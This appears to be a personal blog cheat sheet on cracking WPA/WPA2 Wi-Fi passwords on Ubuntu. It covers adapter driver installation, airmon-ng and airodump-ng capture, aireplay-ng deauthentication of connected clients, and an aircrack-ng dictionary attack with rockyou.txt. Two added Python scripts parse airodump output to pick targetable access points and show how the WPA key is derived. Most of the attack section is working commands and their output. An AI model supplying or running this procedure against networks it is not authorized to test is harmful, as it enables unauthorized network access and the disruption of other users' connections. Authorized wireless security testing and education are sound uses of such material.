These notes are more of a massive cheat sheet for me for Wifi connectivity and Wifi SSID / password cracking.
To do “wifi password hacking”, you need a special Wifi adapter that supports monitor and injection mode. A link to a list of tested adapters is provided in the 2nd code block. Personally, I tested both of the adapters below and can attest that they work. I happen to have two of them: the AWUS036ACS and the QGOO 1750 Mbps.
AWUS036ACS
QGOO 1750 Mbps
The first code block shows how to install drivers for the AWUS036ACS wifi adapter.
The second code block shows how to install drivers for the QGOO 1750 Mbps wifi adapter and how to use aircrack-ng to crack WPA passwords; additionally, some other wifi cheatsheet commands are given to help with wifi connectivity. (Ignore all of the chown / chmods; that's because I accidentally used root to create files inside of a non-root directory, so I wanted to fix those.)
Note: you will most likely have an internal wifi card on your laptop (that connects to the internet) and an external USB wifi adapter that does the “aircrack”ing. While using aircrack you cannot use your internal wifi card, because the processes that connect you to the internet (NetworkManager) get killed. However, after you are done “aircracking” you run a command that re-establishes your internet connectivity (Step 8 below).
Code block 1 – Installing Driver for AWUS036ACS (uses 8812au or 88XXau module)
Wifi Cracking on Ubuntu with AWUS036ACS
###########################################

Install the driver/module for the AWUS036ACS with this guide:
  * https://avabodha.in/install-driver-for-alfa-awus036acs-on-linux/ (old non-DKMS method)
  * https://amigotechnotes.wordpress.com/2020/04/27/build-the-linux-kernel-module-to-enable-rtl8812au-usb-wireless-dongles/ (DKMS method; better)

SIDENOTE0: Do not worry about the content of those links, as I have restated the important information and commands in this article.

To summarize:

$ sudo su
$ lshw -c network -businfo   # missing
$ iw dev                     # nothing
$ lsusb
Bus 003 Device 027: ID 0bda:0811 Realtek Semiconductor Corp. Realtek 8812AU/8821AU 802.11ac WLAN Adapter [USB Wireless Dual-Band Adapter 2.4/5Ghz]
$ git clone https://github.com/aircrack-ng/rtl8812au.git
$ cd ~/rtl8812au
$ sudo make dkms_install     # compile and install the module via DKMS
$ sudo modprobe 88XXau       # optional, just to test that it works; when you plug in the device it will auto-load this module

SIDENOTE: here is how you can compile the original way without DKMS. This method is not as nice because if your kernel updates, you will lose this module and will need to remember to manually recompile. DKMS, on the other hand, automatically recompiles modules each time a kernel is installed.
$ cd rtl8812au
$ make 88XXau.ko
$ make install
$ sudo modprobe 88XXau       # optional, just to test that it works; when you plug in the device it will auto-load this module
End of SIDENOTE

SIDENOTE2: when you install with DKMS the modules go here:
$ find /lib/ | grep 88XXau.ko
/lib/modules/5.15.0-46-generic/kernel/drivers/net/wireless/88XXau.ko   <-- compiled on my old kernel with the original method
/lib/modules/5.15.0-47-generic/updates/dkms/88XXau.ko                  <-- updated the kernel and lost the module, so I recompiled with DKMS; with future kernel updates this module will automatically recompile (see the SIDENOTE in Code Block 2 to see how DKMS recompiled the other driver for me)

Unplug it and plug it back in; you will see lights on it now, and you will see it in:
$ airmon-ng
PHY     Interface        Driver     Chipset
phy0    wlp0s20f3        iwlwifi    14.3 Network controller: Intel Corporation Wi-Fi 6 AX201 (rev 20)
phy5    wlx00c0cab16620  88XXau     Realtek Semiconductor Corp. Realtek 8812AU/8821AU 802.11ac WLAN Adapter [USB Wireless Dual-Band Adapter 2.4/5Ghz]
Code Block 2 – Installing Drivers for QGOO 1750 Mbps, aircracking to get wifi password, and cheatsheet on connections (uses the 8814au module)
Wifi Cracking On Ubuntu With QGOO 1750 Mbps
###############################################

GOOD SOURCES:
===============
  * https://www.wikihow.com/Hack-WPA/WPA2-Wi-Fi-with-Kali-Linux          # how to crack with the aircrack tools
  * https://miloserdov.org/?p=4819                                        # good cheatsheet of commands
  * https://miloserdov.org/?p=5493                                        # how to install the driver for this RTL8814AU wifi adapter (most of the content in the section below)
  * https://www.ceos3c.com/security/best-wifi-adapter-for-kali-linux/    # good devices to inject / monitor with

NOTE ON DRIVER rtl8814au INSTALLATION:
========================================
As I have kernel 5.15 or above, I scrolled to the section of the article "Installing driver on Linux kernel >= 5.15". Below I recap both the older-kernel and the newer-kernel method.

Installing deps
-----------------
Before either method, you must follow the previous section of the article to install the dependencies:
$ sudo su    # so you don't have to keep doing sudo for the driver installs
$ apt update
$ apt install git build-essential libelf-dev linux-headers-`uname -r` debhelper dpkg-dev dkms bc

Kernel older than 5.15:
------------------------------
$ git clone https://github.com/aircrack-ng/rtl8814au
$ cd rtl8814au
$ make dkms_install
$ dkms status
rtl8814au/5.8.5.1, 5.15.0-46-generic, x86_64: installed
8812au/5.6.4.2_35491.20191025, 5.15.0-46-generic, x86_64: installed   <-- you might also see this if you compiled the other driver via DKMS (from Code Block 1)

SIDENOTE: With DKMS the modules install into the dkms directory inside of /lib/modules. Also, when the kernel updates, DKMS automatically recompiles the module for the new kernel (without any manual intervention), so when you boot into the new kernel this module will work. You can see that below.
$ find /lib/ | grep 8814au.ko
/lib/modules/5.15.0-46-generic/updates/dkms/8814au.ko   <-- this is my originally installed module
/lib/modules/5.15.0-47-generic/updates/dkms/8814au.ko   <-- I updated the kernel and this was automatically compiled for me

Kernel 5.15 and higher:
---------------------------
$ git clone https://github.com/morrownr/8814au
$ cd 8814au
$ ./install-driver.sh

MY DEVICES AND INSTALLING IT:
===============================
MY PC: Lenova 7420, Ubuntu 22.04, kernel 5.15.0-46-generic

INSTALLING AIRCRACK ON UBUNTU:
$ apt-get install forensics-all

WIFI ADAPTER:
We basically need a wifi adapter (USB or PCI / internal) that can do injection and monitor mode. The one I mention in this article (QGOO 1750 Mbps), although bulky, gets the job done. My internal one that came with the laptop (wlp0s20f3) cannot do this, as its chipset does not support it. I can put the internal one into monitor mode, but it's not able to do injection.
$ aireplay-ng -9 wlp0s20f3          # fails (internal)
$ aireplay-ng -9 wlx1cbfce7a56fa    # success (QGOO 1750)

Output of airmon-ng showing the drivers:
$ airmon-ng
PHY     Interface        Driver      Chipset
phy0    wlp0s20f3        iwlwifi     14.3 Network controller: Intel Corporation Wi-Fi 6 AX201 (rev 20)
phy6    wlx1cbfce7a56fa  rtl8814au   Realtek Semiconductor Corp. RTL8814AU 802.11a/b/g/n/ac

My device has QGOO 1750 on the front. I purchased it on Amazon. It's based on the RTL8814AU chipset. I googled how to install QGOO 1750 on linux, but that had outdated instructions, so then I came upon the links listed under GOOD SOURCES above.

Plug in the card and make sure it shows up (see the commands in the next section). I had to install the drivers (installed while Secure Boot was running), do some reboots and set a MOK password (same as the USER user password and my Lightbits main work password). Still the interface did not show up. Finally, I had to disable Secure Boot in the BIOS of my laptop and it worked.
Now it did show up as wlx1cbfce7a56fa:
$ iw dev
phy#1
        Interface wlx1cbfce7a56fa
                ifindex 5
                wdev 0x100000001
                addr 1c:bf:ce:7a:56:fa
                type monitor
                txpower 20.00 dBm
phy#0
        Interface wlp0s20f3
                ifindex 2
                wdev 0x1
                addr a8:64:f1:6a:59:9b
                type managed
                txpower 22.00 dBm
                multicast TXQ:
                        qsz-byt qsz-pkt flows   drops   marks   overlmt hashcol tx-bytes        tx-packets
                        0       0       0       0       0       0       0       0               0

We can also see it show up as a USB device with:
$ lshw -c network
$ lsusb
$ lspci

Here is my lsusb output:
$ lsusb
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 003 Device 003: ID 0a5c:5843 Broadcom Corp. 58200
Bus 003 Device 002: ID 1bcf:28cf Sunplus Innovation Technology Inc. Integrated_Webcam_FHD
Bus 003 Device 005: ID 0bda:8813 Realtek Semiconductor Corp. RTL8814AU 802.11a/b/g/n/ac Wireless Adapter   <-- the adapter we will crack with
Bus 003 Device 004: ID 8087:0026 Intel Corp. AX201 Bluetooth
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

wlx1cbfce7a56fa is a really long name, so to make it easier I saved it to a file and a variable:
$ mkdir -p /home/USER/src/wifi/
$ cd /home/USER/src/wifi/
$ I=wlx1cbfce7a56fa
$ echo $I > int     # "int" is a file holding the interface name (not a directory)
So now I can refer to it as $I.

$ iw dev       # can see if it's in monitor or managed mode
$ ip -br a     # can see the IP

When it's scanning it looks like this, by the way:
$ ip -br a
lo               UNKNOWN        127.0.0.1/8 ::1/128
wlp0s20f3        DOWN
tailscale0       UNKNOWN        100.122.151.11/32 fd7a:115c:a1e0:ab12:4843:cd96:627a:970b/128 fe80::56cf:6f09:e1cd:215e/64
docker0          DOWN           172.17.0.1/16
wlx1cbfce7a56fa  UP
$ iw dev
(same output as above: wlx1cbfce7a56fa shows "type monitor", wlp0s20f3 shows "type managed")

Note: the above output shows the wifi adapter wlx1cbfce7a56fa in monitor mode, but by default it's in managed mode.

Cracking Steps
================
TIP: you have to be root to run most of these commands and lots of them output files. So it was not a good idea to be inside /home/USER/src/, as everything it outputs is saved as root:root. So after most steps, in order to keep my fs permissions correct, I ran:
$ cd /home/USER/src/; chmod -R 755 .; chown USER:USER .

Step 1. Once the card is installed and detected, let's begin. Disconnect from Wifi altogether (if you don't, that's okay, the next step will).

Step 2. First kill the processes that interfere with monitor mode:
$ airmon-ng
$ airmon-ng check kill
This kills processes that interfere. It will stop NetworkManager and you will notice the wifi icon in the top right of Ubuntu disappear (it will reappear when you start NetworkManager again).

Step 3. Set the I variable to your interface for easy reference (lately wifi cards have lengthy names):
$ I=wlx1cbfce7a56fa
So now, to refer to it in bash, I will just write $I.

Step 4.
$ airodump-ng $I
Once the network we want shows up (do not go for WPA3; we want WPA or WPA2 in the ENC column), we need its BSSID and CH. The BSSID is the MAC of the access point that's giving out that wifi signal. We get both from the output of the command. We are looking for "Sally 2.4":

[ CH  7 ][ Elapsed: 54 s ][ 2022-08-14 23:32

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC  CIPHER  AUTH  ESSID

 00:25:00:FF:94:73   -1        0        0    0  -1   -1                      <length:  0>
 00:0D:97:00:CE:E2   -1        0        5    0   1   -1   WPA                <length:  0>
 40:3F:8C:FF:B6:F7  -65      127       75    0   8  260   WPA2 CCMP    PSK   2.4 G Sovohn
 5E:7D:7D:2C:3A:99  -68       25        0    0  11  260   WPA2 CCMP    MGT   <length:  0>
 5E:7D:7D:2C:3A:9D  -67       20        0    0  11  260   WPA2 CCMP    PSK   <length:  0>
 5E:7D:7D:2C:3A:9F  -68       13        0    0  11  260   WPA2 CCMP    PSK   <length:  0>
 5C:7D:7D:2B:3A:9C  -69       13        8    0  11  260   WPA2 CCMP    PSK   Sally 2.4
 10:33:BF:70:E2:F3  -76       31        0    0  11  130   WPA2 CCMP    PSK   <length:  0>
 10:33:BF:70:E2:F7  -79       14        0    0  11  130   WPA2 CCMP    MGT   <length:  0>
 10:33:BF:70:E2:F2  -80       20        0    0  11  130   WPA2 CCMP    PSK   Xfinipee
 10:33:BF:70:E2:F5  -80       24        0    0  11  130   WPA2 CCMP    PSK   <length:  0>
 80:CC:9C:AA:9B:01  -81       69        2    0   1  720   WPA3 CCMP    SAE   Sally6e 2.4
 80:CC:9C:AA:9B:02  -82       61        0    0   1  720   WPA3 CCMP    SAE   Sally6e All
 00:0D:97:10:CE:BE  -98        9        0    0   1  54e.  OPN                SVPMeterconnectWIFI
 00:0D:97:00:CE:BE  -83        6        3    0   1  54e.  WPA2 CCMP    PSK   <length:  0>

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 00:25:00:FF:94:73  F6:BC:1C:30:C5:F2  -32    0 -12      52        6
 00:0D:97:00:CE:E2  00:0D:97:00:CE:BE  -67    0 -36e      0        5
 (not associated)   62:10:9E:58:3C:5D  -53    0 - 1       0        1
 (not associated)   5C:7D:7D:2B:3A:9C  -68    0 - 6       0        2
 5C:7D:7D:2B:3A:9C  E2:5A:DE:E3:7F:8E  -50    0 - 6e      6        5
 5C:7D:7D:2B:3A:9C  BE:14:39:A3:55:56  -53    0 - 1       0        6

We want to crack Sally 2.4; here is that line:
 5C:7D:7D:2B:3A:9C  -69       13        8    0  11  260   WPA2 CCMP    PSK   Sally 2.4
The network I want to hack is my own "Sally 2.4" with BSSID "5C:7D:7D:2B:3A:9C" on channel 11. We get the BSSID, channel and SSID from the output of the command.

Step 5. Remember we are inside the path /home/USER/src/wifi, so pwd expands to that.
$ airodump-ng -c number --bssid xx:xx:xx:xx:xx:xx -w dump mon0      # generic form
$ airodump-ng -c 11 --bssid 5C:7D:7D:2B:3A:9C -w dump $I
Note: this will generate files prefixed with the name dump in the current directory.
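Besides the live table, airodump-ng's `-w dump` writes a machine-readable `dump-01.csv` with the same columns (ENC, CIPHER, AUTH, ESSID) plus a station section. The following Python script is an added example, not part of these notes or of the aircrack-ng project: it parses that CSV layout, classifies each access point into the protection class that matters (open, WPA/WPA2-PSK whose strength is entirely the passphrase, WPA3/SAE where a captured handshake cannot be cracked offline, enterprise/MGT), and lists which stations are associated with each AP, which is the "BSSID and STATION next to each other" condition the notes rely on before a handshake can ever be seen. The sample CSV is constructed by hand to mirror the table above; the column order follows the airodump-ng CSV header and the `(not associated)` station marker is the tool's own convention.

```python
"""Parse an airodump-ng CSV (the <prefix>-01.csv written by -w <prefix>) and
summarise each AP's protection class and its associated stations.
Added example; not the page's own code. Sample data is constructed."""
import csv
from dataclasses import dataclass, field

# Constructed sample in the airodump-ng CSV layout: an access-point section,
# a blank line, then a station section. Values are typed in by hand here to
# mirror the page's table; this is not a real capture file.
SAMPLE_CSV = """
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
5C:7D:7D:2B:3A:9C, 2022-08-14 23:32:00, 2022-08-14 23:36:10, 11, 260, WPA2, CCMP, PSK, -69, 13, 8, 0. 0. 0. 0, 9, Sally 2.4,
80:CC:9C:AA:9B:01, 2022-08-14 23:32:00, 2022-08-14 23:36:10,  1, 720, WPA3, CCMP, SAE, -81, 69, 2, 0. 0. 0. 0, 11, Sally6e 2.4,
5E:7D:7D:2C:3A:99, 2022-08-14 23:32:00, 2022-08-14 23:36:10, 11, 260, WPA2, CCMP, MGT, -68, 25, 0, 0. 0. 0. 0, 0, ,
00:0D:97:10:CE:BE, 2022-08-14 23:32:00, 2022-08-14 23:36:10,  1,  54, OPN, , , -98, 9, 0, 0. 0. 0. 0, 19, SVPMeterconnectWIFI,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
E2:5A:DE:E3:7F:8E, 2022-08-14 23:32:05, 2022-08-14 23:36:00, -50, 5, 5C:7D:7D:2B:3A:9C,
BE:14:39:A3:55:56, 2022-08-14 23:32:05, 2022-08-14 23:36:00, -53, 6, 5C:7D:7D:2B:3A:9C,
62:10:9E:58:3C:5D, 2022-08-14 23:32:05, 2022-08-14 23:36:00, -53, 1, (not associated),
"""


@dataclass
class AccessPoint:
    bssid: str
    channel: int
    privacy: str   # ENC column: OPN / WEP / WPA / WPA2 / WPA3 (may list several)
    cipher: str    # CIPHER column: CCMP, TKIP, ...
    auth: str      # AUTH column: PSK, SAE, MGT, ...
    essid: str
    stations: list = field(default_factory=list)


def classify(ap: AccessPoint) -> str:
    """Map ENC/AUTH to the protection class a defender cares about."""
    if "SAE" in ap.auth or "WPA3" in ap.privacy:
        return "wpa3-sae"     # SAE: a captured handshake gives no offline dictionary attack
    if ap.privacy == "OPN":
        return "open"         # no encryption at all
    if "MGT" in ap.auth:
        return "enterprise"   # 802.1X per-user credentials, no shared passphrase
    if ap.privacy.startswith("WPA"):
        return "wpa-psk"      # security rests entirely on the passphrase (the page's case)
    if ap.privacy == "WEP":
        return "wep"          # broken cipher regardless of key
    return "unknown"


def parse_airodump_csv(text: str):
    """Return ({bssid: AccessPoint}, [unassociated station MACs])."""
    lines = text.splitlines()
    split_at = next((i for i, l in enumerate(lines) if l.startswith("Station MAC")), len(lines))
    ap_rows = [l for l in lines[:split_at] if l.strip() and not l.startswith("BSSID,")]
    st_rows = [l for l in lines[split_at + 1:] if l.strip()]
    aps = {}
    for row in csv.reader(ap_rows, skipinitialspace=True):
        if len(row) < 14:            # malformed / truncated line: skip rather than crash
            continue
        ap = AccessPoint(bssid=row[0].strip(), channel=int(row[3]), privacy=row[5].strip(),
                         cipher=row[6].strip(), auth=row[7].strip(), essid=row[13].strip())
        aps[ap.bssid] = ap
    unassociated = []
    for row in csv.reader(st_rows, skipinitialspace=True):
        if len(row) < 6:
            continue
        mac, bssid = row[0].strip(), row[5].strip()   # trailing probed-ESSID fields are ignored
        if bssid in aps:
            aps[bssid].stations.append(mac)
        else:
            unassociated.append(mac)
    return aps, unassociated


def summarize(text: str):
    """Per-BSSID summary dict plus the list of stations not joined to any AP."""
    aps, unassociated = parse_airodump_csv(text)
    report = {b: {"essid": a.essid, "channel": a.channel, "class": classify(a),
                  "stations": sorted(a.stations)} for b, a in aps.items()}
    return report, unassociated


def passphrase_dependent_with_clients(report: dict) -> list:
    """BSSIDs whose security is just a passphrase AND that currently have an
    associated station: the only APs where a handshake could be observed."""
    return sorted(b for b, r in report.items() if r["class"] == "wpa-psk" and r["stations"])


if __name__ == "__main__":
    rep, lone = summarize(SAMPLE_CSV)
    for bssid, r in rep.items():
        print(f"{bssid} ch{r['channel']:>2} {r['class']:<11} {r['essid']!r:<24} stations={r['stations']}")
    print("not associated:", lone)
    print("passphrase-dependent APs with clients:", passphrase_dependent_with_clients(rep))
```

Run it against a real `dump-01.csv` by replacing `SAMPLE_CSV` with the file's contents; the station section's "Probed ESSIDs" column can itself contain commas, which is why the parser only reads the first six station fields.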
Note about where the capture will be dumped to: -w is basically the dump prefix. It will save a few files with that prefix. So with "-w dump" it will create dump-01.cap, dump-01.csv, and more in the current path. If you want it to go to a specific directory, run it like this: "-w /path/to/directory/dump". This will put a lot of files whose names start with "dump" in the directory /path/to/directory/.

Next output: we have to wait until a connection happens, then we see "WPA handshake". Or we can force a connection by doing a deauth attack, after which the user will have to reauthenticate. Instead I just logged out of my Sally 2.4 and logged back in. When we see "WPA handshake: " we can stop with Control ^C. See below.

Sidenote: deauth to get handshake
--------------------------------------
In a real attack we can't just disconnect and reconnect; we have to wait, or force it like this. We can do a deauth attack by following Steps 2, 3 and 4 of the guide: https://www.wikihow.com/Hack-WPA/WPA2-Wi-Fi-with-Kali-Linux
Deauth attacks do not disconnect.
In case you wanted to do Steps 2, 3 and 4 of deauthentication, all you need to do is:
  - Wait for something to connect to the network. Once you see two BSSID addresses appear next to each other, one labelled BSSID (the wifi router) and the other named STATION (the computer or other device), this means a client is connected. To force them into a handshake, you'll now send them deauth packets that kill their connection.
  - Open a new terminal window. Make sure airodump-ng is still running in the other terminal.
  - Run this command:
    $ aireplay-ng -0 2 -c STATION-BSSID -a NETWORK-BSSID mon0
  - Sidenote: the wikiHow article has the arguments for -c and -a backwards. If you try it their way, nothing happens, but with the above correction it properly does a deauth.
  - STATION-BSSID is the BSSID of the client that connected to the network (-c)
  - NETWORK-BSSID is the router's BSSID (-a)
  - In my case it would be: aireplay-ng -0 2 -a 5C:7D:7D:2B:3A:9C -c STATION-BSSID $I
  - Sidenote: since I did not try deauth I did not get a STATION-BSSID; had I tried it, I would put some MAC there like 18:B9:05:D7:3C:AD
  - For an end result of: aireplay-ng -0 2 -a 5C:7D:7D:2B:3A:9C -c 18:B9:05:D7:3C:AD $I

Back to the steps - watching for handshake
-----------------------------------------------
Output of:
$ airodump-ng -c 11 --bssid 5C:7D:7D:2B:3A:9C -w `pwd` $I

[ CH 11 ][ Elapsed: 1 min ][ 2022-08-14 23:36 ][ WPA handshake: 5C:7D:7D:2B:3A:9C

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC  CIPHER  AUTH  ESSID

 5C:7D:7D:2B:3A:9C  -66   0      656     7088   49  11  260   WPA2 CCMP    PSK   Sally 2.4

 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes

 5C:7D:7D:2B:3A:9C  4E:D4:B4:02:A2:AF   -1    6e- 0       0        4
 5C:7D:7D:2B:3A:9C  BE:14:39:A3:55:56  -22    6e-24       0     2471
 5C:7D:7D:2B:3A:9C  18:B9:05:D7:48:77  -35    6e- 6e      0       18
 5C:7D:7D:2B:3A:9C  F4:A4:75:85:1B:D2  -35    6e- 6e      2     5919  EAPOL
 5C:7D:7D:2B:3A:9C  E2:5A:DE:E3:7F:8E  -38    6e- 6       0       20
 5C:7D:7D:2B:3A:9C  48:E1:E9:4F:26:46  -39    6 - 6       0       16
 5C:7D:7D:2B:3A:9C  B4:E8:42:49:E7:72  -49    6e- 6e      0       27
 5C:7D:7D:2B:3A:9C  18:B9:05:D9:27:29  -51    6e- 6e    881       63
 5C:7D:7D:2B:3A:9C  D4:AD:FC:38:04:6C  -54    6e- 6e      0        8
 5C:7D:7D:2B:3A:9C  D4:AD:FC:31:F1:4E  -63    6e- 6e      0       10
 5C:7D:7D:2B:3A:9C  DC:29:19:E2:93:5A  -68    6e- 6e      0       41
 5C:7D:7D:2B:3A:9C  18:B9:05:D7:3C:AD  -67    6e- 1       0       13
 5C:7D:7D:2B:3A:9C  00:5F:67:AE:71:3D  -72    6e- 6       0        9
 5C:7D:7D:2B:3A:9C  B8:3E:59:0C:44:43  -76    6e- 6e      0       80
 5C:7D:7D:2B:3A:9C  02:CA:AE:1A:76:F5  -78    6e- 6       0       64
 5C:7D:7D:2B:3A:9C  DC:29:19:E1:03:BD  -85    0 - 6       1       10

Step 6. When you exit with ^C you will see the files in the current path or the parent path. Copy them to a separate path to be tidy. I put them inside /home/USER/src/wifi/capture-*/ and cd into that path:
$ cd /home/USER/src/wifi/capture-*/

Step 7.
Do the cracking.
Sidenote: you can download a wordlist by googling "rockyou.txt"; it's 136MB in size. I did not see my password 823Sally in rockyou.txt, so I put it in the middle of rockyou-mod.txt. Still, I was curious if it would crack with just rockyou.txt (spoiler alert: it did not crack; the password must be in there exactly, it does not try variations). My lists are in /home/USER/src/lists/rockyou.txt and /home/USER/src/lists/rockyou-mod.txt.
$ aircrack-ng -a2 -b NETWORK-BSSID -w /usr/share/wordlists/rockyou.txt /root/Desktop/*.cap   # generic form
$ aircrack-ng -a2 -b 5C:7D:7D:2B:3A:9C -w /home/USER/src/lists/rockyou.txt *.cap         # failed, as my PW was missing
$ aircrack-ng -a2 -b 5C:7D:7D:2B:3A:9C -w /home/USER/src/lists/rockyou-mod.txt *.cap     # instant success, as my PW was there close to the top

Step 8. When done, restore network connectivity:
$ systemctl start NetworkManager

Cheatsheet on wifi connection
==============================
If you have issues re-establishing connectivity with your main wifi adapter (in our case it's $wlan, which is wlp0s20f3), check if it's up with:
$ ip -br a
If it's not up, see if it's in monitor mode by accident and bring it back to managed:
$ iw dev
$ iwconfig $wlan mode managed      # sidenote: "iwconfig $wlan mode monitor" is another way to get the adapter into monitor mode. Other ways are with iw, or "airmon-ng <start/stop> $wlan"
or
$ iw dev $wlan set type managed    # sidenote: for monitor mode: iw dev $I set monitor control
$ ifconfig $wlan up                # sidenote: change "up" to "down" to bring it down
Also can use:
$ ip link set $wlan <up/down>
$ iw dev $wlan link                # see if it's connected to an SSID

Can force a connection:
$ iw dev $wlan scan | grep SSID    # scan for SSIDs

Connect to wifi with no password:
$ iw dev $wlan connect -w "SSID-with-no-password"

Connect to wifi with WEP:
$ ifconfig $wlan down
$ iwconfig $wlan key s:WEPpassword      # "s:" prefix = ASCII key; without it iwconfig expects hex digits
$ ifconfig $wlan up
$ iwconfig $wlan essid "SSID"
$ iwconfig $wlan ap 00:AA:BB:CC:11:22   # put in the MAC of the AP
$ iwconfig $wlan ap any                 # if you don't know the AP MAC

Connect to wifi with WPA:
$ wpa_passphrase SSID_NAME PASSWORD > conf
$ wpa_supplicant -B -i $wlan -c conf

Get DHCP:
$ dhclient $wlan

Troubleshooting: if rf is blocked, run:
$ rfkill list            # to list
$ rfkill unblock all     # unblocks all rf <-- try this if you can't connect
$ rfkill block all       # blocks all rf
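Two things in these notes are the same fact seen from two sides: `wpa_passphrase SSID PASSWORD` (cheatsheet above) prints a `psk=` hex line, and in Step 7 the wordlist had to contain 823Sally exactly, with no variations. Both come from how WPA/WPA2-PSK derives its key: PSK = PBKDF2-HMAC-SHA1(passphrase, salt = SSID, 4096 iterations, 32 bytes). The following Python script is an added example, not part of these notes or of wpa_supplicant: it reproduces the `wpa_passphrase` network block, checks it against the published IEEE 802.11 test vector (SSID "IEEE", passphrase "password"), and shows that a one-character variant of a passphrase yields a PSK that differs in roughly half its bits, which is why a guess has to match exactly and why every candidate costs a full 4096-round derivation per SSID. The SSID "Sally 2.4" and passphrase "823Sally" are taken from the notes; the variant strings are constructed.

```python
"""How WPA/WPA2-PSK turns a passphrase into the 256-bit PSK (what wpa_passphrase
prints), and why dictionary matching is exact. Added example; not the page's code."""
import hashlib
import time

ITERATIONS = 4096   # fixed by the WPA/WPA2 specification
PSK_LEN = 32        # 256-bit pre-shared key


def wpa_psk(ssid: str, passphrase: str) -> bytes:
    """PSK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32). The SSID is the salt,
    so the same passphrase gives a different PSK on every network."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), ITERATIONS, PSK_LEN)


def wpa_passphrase_block(ssid: str, passphrase: str) -> str:
    """Render the network={...} block the way `wpa_passphrase SSID PASSWORD`
    prints it: the plaintext is kept only as a comment, the psk= line is the
    derived key that wpa_supplicant actually uses."""
    return ("network={\n"
            f"\tssid=\"{ssid}\"\n"
            f"\t#psk=\"{passphrase}\"\n"
            f"\tpsk={wpa_psk(ssid, passphrase).hex()}\n"
            "}\n")


def psk_bit_difference(ssid: str, a: str, b: str) -> int:
    """Number of differing bits between the PSKs of two passphrases (out of 256)."""
    x = int.from_bytes(wpa_psk(ssid, a), "big") ^ int.from_bytes(wpa_psk(ssid, b), "big")
    return bin(x).count("1")


def derivations_per_second(ssid: str, samples: int = 50) -> float:
    """Rough single-core cost of one candidate: each guess is a full PBKDF2 run."""
    start = time.perf_counter()
    for i in range(samples):
        wpa_psk(ssid, f"candidate{i:04d}")   # constructed throwaway candidates
    return samples / (time.perf_counter() - start)


if __name__ == "__main__":
    # Published IEEE 802.11 test vector, so the derivation can be checked offline.
    assert wpa_psk("IEEE", "password").hex() == (
        "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")
    print(wpa_passphrase_block("Sally 2.4", "823Sally"))
    for variant in ("823sally", "823Sally1", "823Sally "):   # constructed near-misses
        print(f"{'823Sally'!r} vs {variant!r}: "
              f"{psk_bit_difference('Sally 2.4', '823Sally', variant)} of 256 PSK bits differ")
    print(f"~{derivations_per_second('Sally 2.4'):.0f} candidates/s on this CPU (pure Python)")
```

The bit-difference output is the practical reading of "it does not do variations": a near-miss passphrase is no closer to the real PSK than a random one, so only an exact entry in the wordlist can succeed, and the defence is a passphrase that no wordlist contains rather than any particular character substitution.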